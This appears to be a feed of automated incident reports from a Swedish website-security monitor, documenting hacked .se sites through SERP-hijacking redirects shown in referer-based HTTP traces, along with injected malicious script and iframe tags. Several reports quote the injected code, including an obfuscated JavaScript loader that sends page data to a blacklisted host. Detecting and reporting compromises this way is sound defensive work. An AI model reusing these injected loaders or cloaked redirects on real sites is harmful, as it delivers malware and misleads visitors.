Säkrare hemsida med .sehttp://iurochskurgammelgarden.se/ (91.201.63.167) - Serp-hijackingAttacked url: http://iurochskurgammelgarden.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 28 Aug 2017 14:41:51 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: iurochskurgammelgarden.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Date: Mon, 28 Aug 2017 12:41:55 GMT <br>Server: Apache <br>X-Powered-By: PHP/5.4.45 <br>X-Pingback: http://www.iurochskurgammelgarden.se/xmlrpc.php <br>Set-Cookie: wfvt_577792889=59a40f9480054; expires=Mon, 28-Aug-2017 13:11:56 GMT; path=/; httponly <br>Location: http://www.iurochskurgammelgarden.se/ <br>Connection: close <br>Content-Type: text/html; charset=UTF-8 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: iurochskurgammelgarden.se <br>Referer: http://www.google.com/search?q=iurochskurgammelgarden.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Moved Temporarily <br>Date: Mon, 28 Aug 2017 12:41:48 GMT <br>Server: Apache <br>X-Powered-By: PHP/5.4.45 <br>Set-Cookie: redirectCookie=1; expires=Tue, 29-Aug-2017 12:41:55 GMT <br>Location: http://islas.co.uk/college/image/ <br>Connection: close <br>Content-Type: text/html<br><br>iurochskurgammelgarden.se is on 91.201.63.167<br>ASN for 91.201.63.167: 0<br>Abusix contact information: abuse@oderland.se (information only)<br>91.201.63.167 corresponds with idefix.wikinggruppen.se<br>Abuse.net does not have any reliable address for idefix.wikinggruppen.se<br>Found address in whois: abuse@oderland.se1503992442http://svaneholmfiber.se/ (195.74.38.127) - Serp-hijackingAttacked url: http://svaneholmfiber.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 28 Aug 2017 11:52:34 +0200<br><br>Visitors with referer are redirected to http://islas.co.uk/college/image/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: svaneholmfiber.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Date: Mon, 28 Aug 2017 09:52:37 GMT <br>Server: Apache <br>X-Powered-By: PHP/5.3.29 <br>X-Pingback: http://www.svaneholmfiber.se/xmlrpc.php <br>Location: http://www.svaneholmfiber.se/ <br>Connection: close <br>Content-Type: text/html; charset=UTF-8 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: svaneholmfiber.se <br>Referer: http://www.google.com/search?q=svaneholmfiber.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Moved Temporarily <br>Date: Mon, 28 Aug 2017 09:52:09 GMT <br>Server: Apache <br>X-Powered-By: PHP/5.3.29 <br>Location: http://islas.co.uk/college/image/ <br>Connection: close <br>Content-Type: text/html<br><br>svaneholmfiber.se is on 195.74.38.127<br>ASN for 195.74.38.127: 0<br>Abusix contact information: drift@binero.se (information only)<br>195.74.38.127 corresponds with cl-23.atm.binero.net<br>Abuse.net has 1 reliable address(es) for binero.net<br>Found address(es): abuse@binero.se1503992378http://stio.se/ (83.168.226.77) - Serp-hijackingAttacked url: http://stio.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 04 Oct 2016 12:52:27 +0200<br><br>Visitors with referer are redirected to http://www.lampsnext.com/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: stio.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Connection: close <br>Date: Tue, 04 Oct 2016 10:52:27 GMT <br>Server: Microsoft-IIS/6.0 <br>X-Powered-By: ASP.NET <br>Content-Length: 13798 <br>Content-Type: text/html <br>Set-Cookie: ASPSESSIONIDQQRRSSAR=KIDDOJDBAMJIDAMMJAMLKILF; path=/ <br>Cache-control: private <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: stio.se <br>Referer: http://www.google.com/search?q=stio.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Connection: close <br>Date: Tue, 04 Oct 2016 10:52:27 GMT <br>Server: Microsoft-IIS/6.0 <br>X-Powered-By: ASP.NET <br>Location: http://www.lampsnext.com/ <br>Content-Length: 146 <br>Content-Type: text/html <br>Set-Cookie: ASPSESSIONIDQQRRSSAR=JIDDOJDBADGFDKMEODIFIFPG; path=/ <br>Cache-control: private<br><br>stio.se is on 83.168.226.77<br>ASN for 83.168.226.77: 0<br>Abusix contact information: abuse@crystone.se (information only)<br>83.168.226.77 corresponds with winweb-7.pem.crystone.net<br>Abuse.net has 1 reliable address(es) for crystone.net<br>Found address(es): abuse@crystone.net1475655464http://hptab.se/ (185.21.40.39) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; type=&quot;text/JavaScript&quot; src=&quot;http://realstatistics.pro/js/analytics.php?id=123&quot;&gt;<br><br>Offensive url: http://realstatistics.pro/js/analytics.php?id=123<br>Url is blacklisted in Google Safe Browsing<br><br>hptab.se is on 185.21.40.39<br>ASN for 185.21.40.39: 0<br>Abusix contact information: abuse@zitcom.dk (information only)<br>185.21.40.39 corresponds with linux83.wannafind.dk<br>Abuse.net has 1 reliable address(es) for wannafind.dk<br>Found address(es): abuse@zitcom.dk1467880155http://1894.se/ (217.16.193.91) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://african-ancestries.com/js/jquery.min.php?c_utt=J18171&amp;c_utm='+encodeURIComponent('http://african-ancestries.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://african-ancestries.com/js/jquery.min.php?c_utt=J18171&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>1894.se is on 217.16.193.91<br>ASN for 217.16.193.91: 0<br>Abusix contact information: abuse@dgc.se (information only)<br>217.16.193.91 corresponds with web-lx5.donator.se<br>Abuse.net has 1 reliable address(es) for donator.se<br>Found address(es): abuse@ondonator.se1464677170http://aconal.se/uterum.htm (80.244.64.172) - Serp-hijackingAttacked url: http://aconal.se/uterum.htm<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 04 Nov 2015 01:05:28 +0100<br><br>Visitors with referer are redirected to http://outlet.monclernpiumini.it/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: aconal.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 8285 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDQSDQCCBQ=ICAKHJIAINFLHKECEFCKCCBO; path=/ <br>X-Powered-By: ASP.NET <br>Date: Wed, 04 Nov 2015 00:05:33 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: aconal.se <br>Referer: http://www.google.com/search?q=aconal.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 154 <br>Content-Type: text/html <br>Location: http://outlet.monclernpiumini.it/ <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDQSDQCCBQ=HCAKHJIAKPDLHAHAAFNALFHC; path=/ <br>X-Powered-By: ASP.NET <br>Date: Wed, 04 Nov 2015 00:05:32 GMT <br>Connection: close<br><br>aconal.se is on 80.244.64.172<br>ASN for 80.244.64.172: 0<br>Abusix contact information: abuse@t3.se (information only)<br>80.244.64.172 corresponds with umeagalan-se.webb2.kontrollpanel.se<br>Abuse.net does not have any reliable address for umeagalan-se.webb2.kontrollpanel.se<br>Found address in whois: abuse@t3.se1446627590http://ceremonius.se/ (195.74.38.161) - MalwareOffensive html code:<br>&lt;iframe height=&quot;150&quot; width=&quot;200&quot; src=&quot;http://gclabrelscon.net/about.php&quot;&gt;<br><br>Offensive url: http://gclabrelscon.net/about.php<br>Url is blacklisted in Google Safe Browsing<br><br>ceremonius.se is on 195.74.38.161<br>ASN for 195.74.38.161: 0<br>Abusix contact information: drift@binero.se (information only)<br>195.74.38.161 corresponds with cl-38.atm.binero.net<br>Abuse.net has 1 reliable address(es) for binero.net<br>Found address(es): abuse@binero.se1431677680http://www.online-casino-bonus.se/casinospel-regler/ (5.133.197.141) - Serp-hijackingAttacked url: http://www.online-casino-bonus.se/casinospel-regler/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 12 Jan 2015 17:03:54 +0100<br><br>Visitors with referer are redirected to http://all-open-24.net/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: www.online-casino-bonus.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Date: Mon, 12 Jan 2015 16:12:26 GMT <br>Server: Apache/2.2.22 (Debian) <br>Last-Modified: Mon, 15 Dec 2014 13:22:16 GMT <br>ETag: &quot;c40b5a-5fcd6-50a4121952a70&quot; <br>Accept-Ranges: bytes <br>Content-Length: 392406 <br>Vary: Accept-Encoding <br>Connection: close <br>Content-Type: text/html <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: www.online-casino-bonus.se <br>Referer: http://www.google.com/search?q=www.online-casino-bonus.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Date: Mon, 12 Jan 2015 16:12:25 GMT <br>Server: Apache/2.2.22 (Debian) <br>Location: http://all-open-24.net/ <br>Vary: Accept-Encoding <br>Connection: close <br>Content-Type: text/html; charset=iso-8859-1<br><br>www.online-casino-bonus.se is on 5.133.197.141<br>ASN for 5.133.197.141: 0<br>5.133.197.141 manually set to use abuse@portlane.com1421152530http://www.online-casino-bonus.se/2010/ (5.133.197.141) - Serp-hijackingAttacked url: http://www.online-casino-bonus.se/2010/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 17 Dec 2014 13:03:30 +0100<br><br>Visitors with referer are redirected to http://all-open-24.net/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: www.online-casino-bonus.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Date: Wed, 17 Dec 2014 12:11:11 GMT <br>Server: Apache/2.2.22 (Debian) <br>Last-Modified: Mon, 15 Dec 2014 13:22:16 GMT <br>ETag: &quot;c40b5a-5fcd6-50a4121952a70&quot; <br>Accept-Ranges: bytes <br>Content-Length: 392406 <br>Vary: Accept-Encoding <br>Connection: close <br>Content-Type: text/html <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: www.online-casino-bonus.se <br>Referer: http://www.google.com/search?q=www.online-casino-bonus.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Date: Wed, 17 Dec 2014 12:11:11 GMT <br>Server: Apache/2.2.22 (Debian) <br>Location: http://all-open-24.net/ <br>Vary: Accept-Encoding <br>Connection: close <br>Content-Type: text/html; charset=iso-8859-1<br><br>www.online-casino-bonus.se is on 5.133.197.141<br>ASN for 5.133.197.141: 0<br>5.133.197.141 manually set to use abuse@portlane.com1418886744http://matguiderna.se/tag/brygga/ (89.221.250.24) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://81.219.193.13/2nmkkcwb.php?id=52884833&quot;&gt;<br><br>Offensive url: http://81.219.193.13/2nmkkcwb.php?id=52884833<br>Url is blacklisted in Google Safe Browsing<br><br>matguiderna.se is on 89.221.250.24<br>ASN for 89.221.250.24: 0<br>89.221.250.24 manually set to use abuse@aname.net1414747550http://www.pyrblancpatron.se/default.asp (195.128.175.65) - Serp-hijackingAttacked url: http://www.pyrblancpatron.se/default.asp<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Sun, 12 Oct 2014 10:56:57 +0200<br><br>Visitors with referer are redirected to http://www.bagsmbirkin.net/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: www.pyrblancpatron.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 12587 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.0 <br>Set-Cookie: ASPSESSIONIDCSBRAQBA=JMOFMIBBPMNMNGJPIDHABMGC; path=/ <br>X-Powered-By: ASP.NET <br>MicrosoftOfficeWebServer: 5.0_Pub <br>MS-Author-Via: MS-FP/4.0 <br>Date: Sun, 12 Oct 2014 08:56:57 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: www.pyrblancpatron.se <br>Referer: http://www.google.com/search?q=www.pyrblancpatron.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 148 <br>Content-Type: text/html <br>Location: http://www.bagsmbirkin.net/ <br>Server: Microsoft-IIS/7.0 <br>Set-Cookie: ASPSESSIONIDCSBRAQBA=IMOFMIBBBLANABFEELLPFBEI; path=/ <br>X-Powered-By: ASP.NET <br>MicrosoftOfficeWebServer: 5.0_Pub <br>MS-Author-Via: MS-FP/4.0 <br>Date: Sun, 12 Oct 2014 08:56:57 GMT <br>Connection: close<br><br>www.pyrblancpatron.se is on 195.128.175.65<br>ASN for 195.128.175.65: 0<br>Abusix contact information: abuse@talkactive.net (information only)<br>195.128.175.65 corresponds with ta65.talkactive.net<br>Abuse.net has 2 reliable address(es) for talkactive.net<br>Found address(es): abuse@webpartner.dk abuse@talkactive.net1413182888http://www.ralphilauren.se/ralph-lauren-pony-duk-gul-apelsin-handväska-p-261.html (31.222.207.191) - Serp-hijackingAttacked url: http://www.ralphilauren.se/ralph-lauren-pony-duk-gul-apelsin-handväska-p-261.html<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Wed, 02 Jul 2014 14:47:32 +0200<br><br>Visitors with referer are redirected to http://www.goodsellwholesaler.com <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: www.ralphilauren.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Date: Wed, 02 Jul 2014 12:47:30 GMT <br>Server: Apache <br>Set-Cookie: cookie_test=please_accept_for_session; expires=Fri, 01-Aug-2014 12:47:30 GMT; path=/; domain=www.ralphilauren.se <br>Set-Cookie: USERID=twotime; path=/ <br>Connection: close <br>Content-Type: text/html; charset=utf-8 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: www.ralphilauren.se <br>Referer: http://www.google.com/search?q=www.ralphilauren.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Moved Temporarily <br>Date: Wed, 02 Jul 2014 12:47:29 GMT <br>Server: Apache <br>Set-Cookie: cookie_test=please_accept_for_session; expires=Fri, 01-Aug-2014 12:47:29 GMT; path=/; domain=www.ralphilauren.se <br>Set-Cookie: USERID=shine-check; path=/ <br>Location: http://www.goodsellwholesaler.com <br>Connection: close <br>Content-Type: text/html; charset=utf-8<br><br>www.ralphilauren.se is on 31.222.207.191<br>ASN for 31.222.207.191: 0<br>Abusix contact information: abuses@idear4business.net (information only)<br>rDNS not found for 31.222.207.191<br>Found address in whois: abuses@idear4business.net1404369899http://www.ralphilauren.se/ralph-lauren-stora-pony-usa-sjunker-tillbaka-svart-dunjacka-p-51.html (31.222.207.191) - Serp-hijackingAttacked url: http://www.ralphilauren.se/ralph-lauren-stora-pony-usa-sjunker-tillbaka-svart-dunjacka-p-51.html<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Mon, 16 Jun 2014 07:55:00 +0200<br><br>Visitors with referer are redirected to http://www.goodsellwholesaler.com <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: www.ralphilauren.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Date: Mon, 16 Jun 2014 05:54:58 GMT <br>Server: Apache <br>Set-Cookie: cookie_test=please_accept_for_session; expires=Wed, 16-Jul-2014 05:54:58 GMT; path=/; domain=www.ralphilauren.se <br>Set-Cookie: USERID=twotime; path=/ <br>Connection: close <br>Content-Type: text/html; charset=utf-8 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: www.ralphilauren.se <br>Referer: http://www.google.com/search?q=www.ralphilauren.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Moved Temporarily <br>Date: Mon, 16 Jun 2014 05:54:56 GMT <br>Server: Apache <br>Set-Cookie: cookie_test=please_accept_for_session; expires=Wed, 16-Jul-2014 05:54:57 GMT; path=/; domain=www.ralphilauren.se <br>Set-Cookie: USERID=shine-check; path=/ <br>Location: http://www.goodsellwholesaler.com <br>Connection: close <br>Content-Type: text/html; charset=utf-8<br><br>www.ralphilauren.se is on 31.222.207.191<br>ASN for 31.222.207.191: 0<br>Abusix contact information: abuses@idear4business.net (information only)<br>rDNS not found for 31.222.207.191<br>Found address in whois: abuses@idear4business.net1402903150http://www.almrinsrorservice.se/rea-oakley-motogp-plaintiff-online-p-133.html (176.53.24.118) - Serp-hijackingAttacked url: http://www.almrinsrorservice.se/rea-oakley-motogp-plaintiff-online-p-133.html<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 03 Jun 2014 23:10:57 +0200<br><br>Visitors with referer are redirected to http://www.goodsellwholesaler.com <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: www.almrinsrorservice.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Date: Tue, 03 Jun 2014 21:10:55 GMT <br>Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_perl/2.0.6 Perl/v5.10.1 <br>X-Powered-By: PHP/5.3.27 <br>Expires: Thu, 19 Nov 1981 08:52:00 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br>Set-Cookie: zenid=04f46a64a6116066d7010538f7e62f94; path=/; domain=.www.almrinsrorservice.se; HttpOnly <br>Set-Cookie: USERID=twotime; path=/ <br>Connection: close <br>Content-Type: text/html; charset=utf-8 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: www.almrinsrorservice.se <br>Referer: http://www.google.com/search?q=www.almrinsrorservice.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Moved Temporarily <br>Date: Tue, 03 Jun 2014 21:10:54 GMT <br>Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_perl/2.0.6 Perl/v5.10.1 <br>X-Powered-By: PHP/5.3.27 <br>Expires: Thu, 19 Nov 1981 08:52:00 GMT <br>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 <br>Pragma: no-cache <br>Set-Cookie: zenid=73dcfd961db5fac3dccbd802799c898c; path=/; domain=.www.almrinsrorservice.se; HttpOnly <br>Set-Cookie: USERID=shine-check; path=/ <br>Location: http://www.goodsellwholesaler.com <br>Connection: close <br>Content-Type: text/html; charset=utf-8<br><br>www.almrinsrorservice.se is on 176.53.24.118<br>ASN for 176.53.24.118: 0<br>Abusix contact information: abuse@as42926.net (information only)<br>176.53.24.118 corresponds with 176-53-24-118.turkrdns.com<br>Abuse.net has 5 reliable address(es) for turkrdns.com<br>Found address(es): abuse@theplanet.com abuse@myorderbox.com abuse@rh.com.tr abuse@ttnet.net.tr abuse@turkrdns.com1401866048http://www.ralphilauren.se/ralph-lauren-klassisk-passform-mesh-polo-gr-p-425.html (31.222.207.191) - Serp-hijackingAttacked url: http://www.ralphilauren.se/ralph-lauren-klassisk-passform-mesh-polo-gr-p-425.html<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 03 Jun 2014 21:52:27 +0200<br><br>Visitors with referer are redirected to http://www.goodsellwholesaler.com <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: www.ralphilauren.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Date: Tue, 03 Jun 2014 19:52:26 GMT <br>Server: Apache <br>Set-Cookie: cookie_test=please_accept_for_session; expires=Thu, 03-Jul-2014 19:52:26 GMT; path=/; domain=www.ralphilauren.se <br>Set-Cookie: USERID=twotime; path=/ <br>Connection: close <br>Content-Type: text/html; charset=utf-8 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: www.ralphilauren.se <br>Referer: http://www.google.com/search?q=www.ralphilauren.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Moved Temporarily <br>Date: Tue, 03 Jun 2014 19:52:25 GMT <br>Server: Apache <br>Set-Cookie: cookie_test=please_accept_for_session; expires=Thu, 03-Jul-2014 19:52:25 GMT; path=/; domain=www.ralphilauren.se <br>Set-Cookie: USERID=shine-check; path=/ <br>Location: http://www.goodsellwholesaler.com <br>Connection: close <br>Content-Type: text/html; charset=utf-8<br><br>www.ralphilauren.se is on 31.222.207.191<br>ASN for 31.222.207.191: 0<br>Abusix contact information: abuses@idear4business.net (information only)<br>rDNS not found for 31.222.207.191<br>Found address in whois: abuses@idear4business.net1401866036